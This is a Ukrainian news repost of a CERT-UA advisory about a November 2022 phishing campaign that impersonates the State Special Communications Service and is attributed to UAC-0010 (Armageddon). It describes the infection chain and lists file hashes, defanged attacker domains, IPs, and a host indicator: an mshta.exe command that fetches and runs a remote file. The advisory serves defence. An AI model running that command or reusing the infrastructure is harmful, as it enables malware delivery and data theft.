• Посилання скопійовано

Увага! І знову чергова кібератака під час війни

Хакери надсилають начебто від імені Держспецзв'язку листи зі шкідливим посиланням

Увага! І знову чергова кібератака під час війни

Загальна інформація

Урядовою командою реагування на комп'ютерні надзвичайні події України CERT-UA з 07.11.2022 фіксуються розсилки електронних листів, начебто, від імені Держспецзв'язку, зі шкідливим посиланням. У разі переходу за посиланням на ЕОМ буде завантажено HTML-файл, який містить JavaScript-код, що забезпечить створення на комп'ютері жертви RAR-архіву, наприклад «08.11.2022.rar». 

Згаданий архів містить файл-ярлик «Засоби ТЗІ, які мають експертний висновок про відповідність до вимог технічного захисту інформації.lnk», відкриття якого призведе до завантаження і запуску HTA-файлу, що, в свою чергу, спричинить створення запланованого завдання та подальший запуск VBScript-коду. Насамкінець, на комп'ютер будуть завантажені інші шкідливі програми, в тому числі, для викрадення файлів. 

Зауважимо, що розсилка електронних листів здійснюється за допомогою сервісу @mail.gov.ua. Крім того, як і раніше, для визначення IP-адреси серверу управління використовується або третьосторонній сервіс (cloudflare-dns[.]com) або Telegram.

Активність асоційовано з діяльністю групи UAC-0010 (Armageddon).   

 

Індикатори компрометації

Файли:

3adbc03f755a67fea42b6ca96b594237 8badadda788a53549ec889f648f3c85354c1765c7a2d8acfbcfc69aa3002e933 07-11-2022.xhtml
a19a7f22e599b4ff9a30d8917a801ffb 424a9224b2f1a462a5de7222b98e1a95205e5bdad8beae892309be3ad4279363 07.11.2022.rar
85dc81ba98e7ba81b00c3f4554e23f41 c4d44834436baf347f01ac66f7e04e73bc1cb44cd938bd2992bcb11fef958801 Засоби ТЗІ, які мають експертний висновок про відповідність до вимог технічного захисту інформації.lnk
c1074dbc69079bc44f517c5a2092f05e b27b901f363304a188348880df278af5954b288b5c614c3b85e7e1d8057cf3a1 growth.rtf
d67119d10668cd3f78ec2abefc6713d4 fe37eae9986ad6d9a1709aa2993e13965d1bd9f0b7733c0a09c2b36531c31086 jersey
146694cdc0e529bb175741c8331fcbda aafde3c78194495c57066b8e6219da1caab9031da1b22f9dc6deef14ac3b5cfc 07_11_2022.xhtml
5f2d3f456eb549f31afa372d1a877152 95b67d3bb530bf9ce98fa017ec2270176977a775e013df4db2038257ca6d17c3 07.11.2022.rar
ab8600c3150ff6a5a803130438fdfae9 53f472e9a3d3471a76f13d12417229d23efd11b047353db8b71793feacafb029 Засоби ТЗІ, які мають експертний висновок про відповідність до вимог технічного захисту інформації.lnk
0ede5c6f925b4ef08446c063c4805ff9 94a2b39e00ff03061093cce7ead1aab677c939400428a37a00bf89333655ba82 08.11.2022.arhiv
1af530c3daa10a6a9ad973bd7e1904ed 704a6ade1ad9ccb52ff52ae86ca0bce068f14134bd4f1ab6f7506b3f201ba55b 08.11.2022.rar
3864263b8b3d86a1f6861b15c646aab0 1281abff0809bbb1de56bed6f5ebfa111c3c42918732ededae63b76007364582 Засоби ТЗІ, які мають експертний висновок про відповідність до вимог технічного захисту інформації.lnk

 

Мережеві:

08362793@mail.gov[.]ua

154[.]111.181.171

173[.]199.90.103

45[.]32.171.4

hXXp://arhiv.ua-cip[.]org/08.11.2022.arhiv

hXXp://tzi.info-cip[.]org/07_11_2022.xhtml

hXXps://civh[.]ru/08.11/band.rtf

hXXps://hilr[.]ru/07.11/growth.rtf

hXXps://hilr[.]ru/07.11/sent.rtf

hXXps://cloudflare-dns[.]com/dns-query?name= (для визначення IP-адреси; легітимний сервіс)

hXXps://t[.]me/s/vozmoz2

hilr[.]ru

civh[.]ru

rubidiumo[.]ru

shapurt[.]ru

ardeas[.]ru

tzi.info-cip[.]org

arhiv.ua-cip[.]org

ua-cip[.]org

info-cip[.]org

 

Хостові:

C:\Windows\System32\mshta.exe hxxps://civh[.]ru/08.11/band.rtf

%USERPROFILE%\Contacts\jersey

 

Графічні зображення

***

Всі новини на тему кібератаки можна передивитися за посиланням

Джерело: CERT-UA

Рубрика: Суспільство і життя/Суспільство, події

Зверніть увагу: новинна стрічка «Дебету-Кредиту» містить не тільки редакційні матеріали, але також статті сторонніх авторів, роз'яснення співробітників фіскальної служби тощо.

Дані матеріали, а також коментарі до них, відображають виключно точку зору їх авторів і можуть не співпадати з точкою зору редакції. Редакція не ідентифікує особи коментаторів, не модерує тексти коментарів та не несе відповідальності за їх зміст.

30 днiв передплати безкоштовно!Оберiть свiй пакет вiд «Дебету-Кредиту»
на мiсяць безкоштовно!
Спробувати

Усі новини рубрики «Суспільство, події»